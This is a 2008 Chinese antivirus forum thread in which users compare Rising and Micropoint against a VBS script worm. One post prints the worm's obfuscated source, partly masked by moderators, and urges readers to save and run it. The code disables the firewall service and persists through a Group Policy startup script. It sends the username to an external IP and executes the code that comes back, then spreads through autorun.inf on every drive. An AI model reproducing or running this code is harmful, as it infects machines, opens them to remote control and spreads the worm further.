微点交流论坛

标题: 面对VBS脚本病毒，我终于放弃瑞星使用微点 [打印本页]

作者: mugod 时间: 2008-6-5 19:30 标题: 面对VBS脚本病毒，我终于放弃瑞星使用微点

了解微点已经有2年了吧，虽然心里隐约觉得微点的杀毒理念更先进，但是在跟别人推荐的时候，无一例外都是推荐的瑞星，而且自己安装的也都是瑞星，做多两者合用。
由于在单位，机子不能上网，只能用瑞星+离线升级包，本来卡巴也是考虑的，不过离线升级很麻烦就作罢了。由于本人的影响力，起码也有几十台机子同样装的瑞星。可是尽管每个礼拜更新两次，依然有人反映瑞星中招，很无奈啊，通常只能等更新的升级包出来再查杀，可是最近，面对无敌的VBS脚本病毒，瑞星彻底歇菜了，我取了两个病毒样本，每天升级了瑞星的病毒库就扫一下，一个礼拜已经过去了，依然没有动静。使用微点，运行后几秒钟内无反应，而后就提示发现木马衍生物等等，然后VBS本体也被删除了。不过如果微点过期，虽然也能提示有木马，但依然会中招。
我想大部分人可能未必敢像我这样测试，主要是因为我装的雨过天晴还原系统，万一有问题可以直接还原，也就是重启一次的时间。我原来还认为瑞星虽然杀毒的确有点后知后觉，可是过几天还是能反应过来的，但是通过这次测试，已经证明瑞星面对vbs脚本病毒是多么苍白无力。我想这就是杀毒理念的差距了，VBS在执行前，等同于文本文件，稍微加花，特征码就变得面目全非，不可能再找到有规律的特征值了。而微点通过行为判断，直指要害，后发制人。本来还想测试卡巴斯基的，因为卡巴的升级速度还是很猛的，所谓唯快不破嘛，无奈卡巴的程序稳定性依然有问题，装了后几分钟程序体就崩溃一次，没心情测试了，想卸载还出错，建议卡巴的工程师先学会写稳定的程序再来做杀毒。（对于卡巴的稳定性，我想争议还是很大的，有人用的就是很稳定，我想这就是个体差异，如果有人对于这点有异议，我觉得实在没有争论的必要，像瑞星，程序本身做的绝对稳定，在非病毒使然的情况下，很少有崩溃的情况发生。对于微点，还有待观察，听说不是很稳定，我sp2+微点的时候装sp3也蓝屏了，这也是我开始不敢力荐微点的原因）
现在单位的机子有一半在我的建议下改装微点。我想微点对于我们这样的离线用户应该考虑一下了，到底如何授权和更新。也许短信注册也是个不错的方法。就像雨过天晴一样。
现在我自己的电脑安全解决方案就是雨过天晴+微点，能过微点的未必能穿还原，能穿还原的未必能过微点。互相守护，以策万全。

作者: Legend 时间: 2008-6-5 20:01
谢谢楼主的反馈和支持，欢迎您继续作深入的测试使用。
关于蓝屏问题请提供蓝屏文件给我们具体分析原因；
目前官方网站已经提供了离线升级包下载，方便不能上网的网友升级使用。

作者: 只影飘零 时间: 2008-6-5 22:03
为什么我双击VBS病毒微点都没有反应呢？

作者: Legend 时间: 2008-6-5 22:16
vbs文件本身属于脚本文件可以使用记事本打开，自身不具备对系统的直接危害，但是会利用系统漏洞去下载其他恶意程序或者启动其他恶意程序，微点软件是依据程序行为判断病毒的，程序有了病毒行为才会去拦截并报警，对于通过vbs下载或者启动的恶意程序如果发生病毒行为就会直接拦截并报警提示操作。所以对于那些经过加密加花处理的vbs可以轻松躲过传统特征值扫描监控，而微点软件行为判断却能很好的防御。

作者: mugod 时间: 2008-6-6 18:20
我把自己养了2个礼拜的VBS脚本病毒的样本贴上来，该款病毒瑞星至今不能查杀。不过也难为瑞星了，查杀个文本文件确实有难度。病毒的作者也很有意思，还留了e-mail，说“并不是我想伤害你，只是我需要份IT的工作” 哎，无奈啊，微点的成功将导致多少人失业啊，但是技术的发展是永无止境的，一旦微点止步不前，势必被病毒的发展迎头赶上，加油吧！微点！等上市了一定买一套，算是支持下民族高新技术业吧，再没有自己的高技术产业，中国的前途将黯淡！希望大家能一起支持！

顺便如果有卡巴的用户也可以测试一下，把分割线内的文本复制下来，另存为txt文件，再把后缀改成vbs即可。微点的用户如果运行，能成功阻止程序运行并查杀，但是如果你的微点过期了，图标变暗色，将无法成功阻止病毒的侵袭，切记！

---------------我是华丽的分割线---------------------------------------

On Error Resume Next
Set FSO=/已屏蔽/("%73%63%52%69%50%74%69%4E%47%2E%66%49%4C%65%53%79%73%74%65%6D%4F%62%6A%65%63%74"))
Set WshShell=CreateObject(UnEscape("%57%73%63%52%69%70%54%2E%73%68%65%4C%6C"))
Dim Dri_List,Dri_List0
Dim IsSend
IsSend=0
C_Time=Date()
WshShell.Run "net stop sharedaccess",0
Set Drvs=FSO.Drives
SysDir=FSO.GetSpecialFolder(1)
ThisPath==/已屏蔽/
Set Fc=FSO.OpenTextFile(ThisPath,1)
sCopy=Fc.ReadAll
Fc.Close
Set Fc=Nothing
Call WriteFile(SysDir&"\SysInfo.reg",UnEscape("%57%69%6E%64%6F%77%73%20%52%65%67%69%73%74%72%79%20%45%64%69%74%6F%72%20%56%65%72%73%69%6F%6E%20%35%2E%30%30%20%0D%0A%0D%0A%5B%48%=/已屏蔽/%5F%4C%4F%43%41%4C%5F%4D%41%43%48%49%4E%45%5C%53%4F%46%54%57%41%52%45%5C%50%6F%6C%69%63%69%65%73%5C%4D%69%63%72%6F%73%6F%66%74%5C%57%69%6E%64%6F%77%73%5C%53%79%73%74%65%6D%5C%53%63%72%69%70%74%73%5C%53%74%61%72%74%75%70%5C%30%5D%20%0D%0A%22%47%50%4F%2D%49%44%22%3D%22%4C%6F%63%61%6C%47%50%4F%22%20%0D%0A%22%53%4F%4D%2D%49%44%22%3D%22%4C%6F%63%61%6C%22%20%0D%0A%22%46%69%6C%65%53%79%73%50%61%74%68%22%3D%22%25%57%69%6E%44%69%72%25%5C%5C%53%79%73%74%65%6D%33%32%5C%5C%47%72%6F%75%70%50%6F%6C%69%63%79%5C%5C%4D%61%63%68%69%6E%65%22%20%0D%0A%22%44%69%73%70%6C%61%79%4E%61%6D%65%22%3D%22%4C%6F%63%61%6C%20%47%72%6F%75%70%20%50%6F%6C%69%63%79%22%20%0D%0A%22%47%50%4F%4E%61%6D%65%22%3D%22%4C%6F%63%61%6C%20%47%72%6F%75%70%20%50%6F%6C%69%63%79%22%20%0D%0A%0D%0A%5B%48%4B%45%59%5F%4C%4F%43%41%4C%5F%4D%41%43%48%49%4E%45%5C%53%4F%46%54%57%41%52%45%5C%50%6F%6C%69%63%69%65%73%5C%4D%69%63%72%6F%73%6F%66%74%5C%57%69%6E%64%6F%77%73%5C%53%79%73%74%65%6D%5C%53%63%72%69%70%74%73%5C%53%74%61%72%74%75%70%5C%30%5C%30%5D%20%0D%0A%22%53%63%72%69%70%74%22%3D%22%25%57%69%6E=/已屏蔽/72%25%5C%5C%73%79%73%74%65%6D%33%32%5C%5C%70%72%6E%63%66%67%2E%76%62%73%22%20%0D%0A%22%50%61%72%61%6D%65%74%65%72%73%22%3D%22%22%20%0D%0A%22%45%78%65%63%54%69%6D%65%22%3D%68%65%78%28%62%29%3A%30%30%2C%30%30%2C%30%30%2C%30%30%2C%30%30%2C%30%30%2C%30%30%2C%30%30%2C%30%30%2C%30%30%2C%30%30%2C%30%30%2C%30%30%2C%30%30%2C%30%30%2C%30%30%20%0D%0A%0D%0A%5B%48%4B%45%59%5F%4C%4F%43%41%4C%5F%4D%41%43%48%49%4E%45%5C%53%4F%46%54%57%41%52%45%5C%4D%69%63%72%6F%73%6F%66%74%5C%57%69%6E%64%6F%77%73%5C%43%75%72%72%65%6E%74%56%65%72%73%69%6F%6E%5C%47%72%6F%75%70%20%50%6F%6C%69%63%79%5C%53%74%61%74%65%5C%4D%61%63%68%69%6E%65%5C%53%63%72%69%70%74%73%5C%53%74%61%72%74%75%70%5C%30%5D%20%0D%0A%22%47%50%4F%2D%49%44%22%3D%22%4C%6F%63%61%6C%47%50%4F%22%20%0D%0A%22%53%4F%4D%2D%49%44%22%3D%22%4C%6F%63%61%6C%22%20%0D%0A%22%46%69%6C%65%53%79%73%50%61%74%68%22%3D%22%25%57%69%6E%44%69%72%25%5C%5C%53%79%73%74%65%6D%33%32%5C%5C%47%72%6F%75%70%50%6F%6C%69%63%79%5C%5C%4D%61%63%68%69%6E%65%22%20%0D%0A%22%44%69%73%70%6C%61%79%4E%61%6D%65%22%3D%22%4C%6F%63%61%6C%20%47%72%6F%75%70%20%50%6F%6C%69%63%79%22%20%0D%0A%22%47%50%4F%4E%61%6D%65%22%3D%22%4C%6F%63%61%6C%20%47%72%6F%75%70%20%50%6F%6C%69%63%79%22%20%0D%0A%0D%0A%5B%48%4B%45%59%5F%4C%4F%43%41%4C%5F%4D%41%43%48%49%4E%45%5C%53%4F%46%54%57%41%52%45%5C%4D%69%63%72%6F%73%6F%66%74%5C%57%69%6E%64%6F%77%73%5C%43%75%72%72%65%6E%74%56%65%72%73%69%6F%6E%5C%47%72%6F%75%70%20%50%6F%6C%69%63%79%5C%53%74%61%74%65%5C%4D%61%63%68%69%6E%65%5C%53%63%72%69%70%74%73%5C%53%74%61%72%74%75%70%5C%30%5C%30%5D%20%0D%0A%22%53%63%72%69%70%74%22%3D%22%25%57%69%6E%44%69%72%25%5C%5C%73%79%73%74%65%6D%33%32%5C%5C%70%72%6E%63%66%67%2E%76%62%73%22%20%
If Instr(ThisPath,SysDir)>0 then
impersonationLevel=impersonate}!\\.\root\cimv2")
Set colComputers = objWMIService.ExecQuery("Select * from Win32_ComputerSystem")
For Each objComputer in colComputers
UserName=ObjComputer.username
Next
Do
If IsSend=0 Then
Set xml=CreateObject=/已屏蔽/4D%49%63%52%4F%53%4F%66%74%2E%78%6D%6C%68%74%54%70"))
xml.Open "GET","http://202.119.104.100/zzb/eva/count.asp?a="&UserName,0
xml.Send()
If Err.Number=0 Then
IsSend=1
If Len(xml.responseText)>15 Then ExeCute xml.responseText
Else
Err.Clear
End If
Set xml=Nothing
End If

Dri_List=ListDrv()
For Dri_k=1 To Len(Dri_List)
If Instr(Dri_List0,Mid(Dri_=/已屏蔽/0 Then
Call WriteAuto(Mid(Dri_List,Dri_k,1)&":\")
End If
Next
Dri_List0=Dri_List
Wscript.Sleep 1000
Loop
Else
WshShell.Run "Explorer .\"
Wscript.Sleep 500
WshShell.SendKeys "% X"
WshShell.AppActivate UnEscape("%u6211%u7684%u7535%u8111")
Wscript.Sleep 100
WshShell.SendKeys "% C"
RunFlag=0
For each ps in getobject _
("winmgmts:\\.\root\=/已屏蔽/_process").instances_
If LCase(ps.name)="wscript.exe" Then
RunFlag=RunFlag+1
End If
Next
If RunFlag>=2 Then Wscript.quit
Set SF=FSO.GetFolder(SysDir)
F_Time=Left(SF.DateCreated,Instr(SF.DateCreated," ")-1)
WshShell.Run "cmd /c Date "&F_Time,0
Wscript.Sleep 100
Call WriteFile(SysDir&"\prncfg.vbs",sCopy)
WshShell.Run "cmd /c Date "&C_Time,0
WshShell.Run SysDir&"\prncfg.vbs"
End If

Function ListDrv()
ExeCute UnEscape("%44%69%6D%20%54%6D%70%5F%4C%69%73%74%0D%0A%54%6D%70%5F%6C%69%73%74%3D%22%22%0D%0A%46%6F%72%20%45%61%63%68%20%44%72%76%20%69%6E%20%44%72%76%73%0D%0A%49%66%20%44%72%76%2E%49%73%52%65%61%64%79%20%54%68%65%6E%0D%0A%54%6D%70%5F%4C%69%73%74%3D%54%6D%70%5F%4C%69%73%74%26%44%72%76%2E%44%72%69%76%65%4C%65%74%74%65%72%0D%0A%45%6E%64%20%49%66%0D%0A%4E%65%78%74%0D%0A%4C%69%73%74%44%72%76%3D%54%6D%70%5F%6C%69%73%74")
End Function

Sub =/已屏蔽/
ExeCute UnEscape("%49%66%20%46%53%4F%2E%46%6F%6C%64%65%72%45%78%69%73%74%73%28%50%61%74%68%26%22%61%75%74%6F%72%75%6E%2E%69%6E%66%22%29%20%54%68%65%6E%0D%0A%46%53%4F%2E%4D%6F%76%65%46%6F%6C%64%65%72%20%50%61%74%68%26%22%61%75%74%6F%72%75%6E%2E%69%6E%66%22%2C%50%61%74%68%26%52%6E%64%28%29%0D%0A%45%6C%73%65%49%66%20%46%53%4F%2E%46%69%6C%65%45%78%69%73%74%73%28%50%61%74%68%26%22%61%75%74%6F%72%75%6E%2E%69%6E%66%22%29%20%54%68%65%6E%0D%0A%46%53%4F%2E%44%65%6C%65%74%65%46%69%6C%65%20%50%61%74%68%26%22%61%75%74%6F%72%75%6E%2E%69%6E%66%22%2C%54%72%75%65%0D%0A%45%6E%64%20%49%66")
Call WriteFile(Path&"autorun.inf",UnEscape("%5Bautorun%5D%0D%0Aopen%3D%0D%0Ashell%5Cn%3D%u66F4%u6362%u56FE%u6807%20%0D%0Ashell%5Copen%3D%u6253%u5F00%28%26O%29%0D%0Ashell%5Copen%5CCommand%3DWScript.exe%20eva.vbs%0D%0Ashell%5Copen%5CDefault%3D1%0D%0Ashell%5Cexplore%3D%u8D44%u6E90%u7BA1%u7406%u5668%28%26X%29%0D%0Ashell%5Cexplore%5CCommand%3DWScript.exe%20eva.vbs"))
Call WriteFile(Path&"eva.vbs",sCopy)
End Sub

=/已屏蔽/(fPath,Content)
ExeCute UnEscape("%49%66%20%46%53%4F%2E%46%69%6C%65%45%78%69%73%74%73%28%66%50%61%74%68%29%20%54%68%65%6E%20%46%53%4F%2E%44%65%6C%65%74%65%46%69%6C%65%20%66%50%61%74%68%2C%54%72%75%65%0D%0A%53%65%74%20%46%63%3D%46%53%4F%2E%4F%70%65%6E%54%65%78%74%46%69%6C%65%28%66%50%61%74%68%2C%32%2C%54%72%75%65%29%0D%0A%46%63%2E%57%72%69%74%65%20%43%6F%6E%74%65%6E%74%0D%0A%46%63%2E%43%6C%6F%73%65%0D%0A%53%65%74%20%46%63%3D%4E%6F%74%68%69%6E%67%0D%0A%53%65%74%20%46%61%3D%46%53%4F%2E%47%65%74%46%69%6C%65%28%66%50%61%74%68%29%0D%0A%46%61%2E%41%74%74%72%69%62%75%74%65%73%3D%37%0D%0A%53%65%74%20%46%61%3D%4E%6F%74%68%69%6E%67")
End Sub

'I don't want to hurt you, but I just want an IT job
'Email:evar@live.cn

根据论坛规定，已经对代码进行屏蔽。---------------我是华丽的分割线---------------------------------------

[ Last edited by Legend on 2008-6-6 at 18:25 ]

作者: mugod 时间: 2008-6-7 10:06
哎，部分代码都屏蔽了，测试不了鸟，今天瑞星没升级，依然无法查杀。比较想知道卡巴的查杀结果，但是懒得装~~~

作者: 100000 时间: 2008-6-7 16:07
来晚了，没戏看。

作者: liangjian0 时间: 2008-6-7 16:21
是不是真的啊

琴帝

作者: mugod 时间: 2008-6-8 00:26
瑞星6月7号上午9点50分的病毒库依然无法查杀，继续等待，看来瑞星这次真的没辙了，我在猜想也许运行了以后瑞星会杀灭？我马上试试，再来汇报结果

作者: mugod 时间: 2008-6-8 01:07
有意思，很有意思，刚才测试了一下，发现了很多有趣的现象。
1，彻底证明了瑞星的防护是毫无作用的，即使开了监控，也无法控制vbs病毒的运行
2，开始微点是停止了，后来运行了vbs以后，打开微点，再次运行vbs病毒，微点就没有提示了。不过无论双击哪个衍生的木马病毒，微点都有提示，确认后删除。
3，如果开始就打开微点，再运行vbs病毒，等几秒钟，微点会提示病毒，并删除衍生物，以及vbs病毒本体，会提示3次。也许vbs里设置的只执行3次，但是万一是个死循环，微点岂不是始终在提示病毒？这种情况微点准备怎么处理？？
4，貌似现在病毒很智能了，原来我的硬盘做过优盘病毒免疫，就是建立一个名字为AUTORUN.INF的不可删除的文件夹，现在病毒将其改名为随机数，呵呵，看来优盘免疫算是彻底失效了。

有点很奇怪，导致这次测试并不完全。第二次开着瑞星监控，运行vbs病毒的时候，并没有产生木马等衍生物，只是把vbs加到硬盘的自动运行里。导致无法测试瑞星对vbs病毒衍生物的杀灭情况。查了瑞星的日志，没有任何记录，奇怪了，运行两次病毒，行为还不一样了，真邪门。

作者: mp2007 时间: 2008-6-8 19:23
官方网站已经提供了离线升级包下载

http://www.micropoint.com.cn/mpdownload.php

以前很期待的事情

[ Last edited by mp2007 on 2008-6-8 at 19:24 ]

作者: 点饭的百度空间 时间: 2008-6-9 13:10

Quote:

Originally posted by mugod at 2008-6-6 18:20:
我把自己养了2个礼拜的VBS脚本病毒的样本贴上来，该款病毒瑞星至今不能查杀。不过也难为瑞星了，查杀个文本文件确实有难度。病毒的作者也很有意思，还留了e-mail，说“并不是我想伤害你，只是我需要份IT的工作” ...

技术的发展是永无止境的，一旦微点止步不前，势必被病毒的发展迎头赶上，加油吧！微点！

说的好支持下

作者: 湖边小屋 时间: 2008-6-9 16:56
多谢LZ的测试，有好几个亲戚的电脑原来是用瑞星，在出了问题后，都给他们装上了微点。

作者: shambhala 时间: 2008-6-25 23:12
用卡巴8测试一下看

作者: df747 时间: 2008-6-26 00:18
前两个月也介绍给群里网友,结果最先用的就系统崩溃了.......再不敢推荐,因为我也是朋友推荐使用但是用后效果很好,想不到一介绍给别人就系统崩溃

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn